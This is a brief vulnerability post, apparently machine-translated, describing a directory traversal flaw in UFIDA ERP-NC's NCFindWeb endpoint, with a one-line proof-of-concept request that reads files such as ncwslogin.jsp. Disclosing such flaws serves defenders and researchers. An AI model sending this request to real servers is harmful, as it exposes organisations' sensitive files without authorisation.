Post

Ufida Erp Nc Ncfindweb Directory Traversal Vulnerability

Ufida Erp Nc Ncfindweb Directory Traversal Vulnerability

UFIDA ERP-NC NCFindWeb directory traversal vulnerability

Vulnerability Description

UFIDA ERP-NC has a directory traversal vulnerability, and attackers can obtain sensitive file information through directory traversal.

Vulnerability Impact

UFIDA ERP-NC

Network surveying and mapping

Vulnerability reappears

POC is

/NCFindWeb?service=IPreAlertConfigService&filename=

img

View ncwslogin.jsp file

img

This post is licensed under CC BY 4.0 by the author.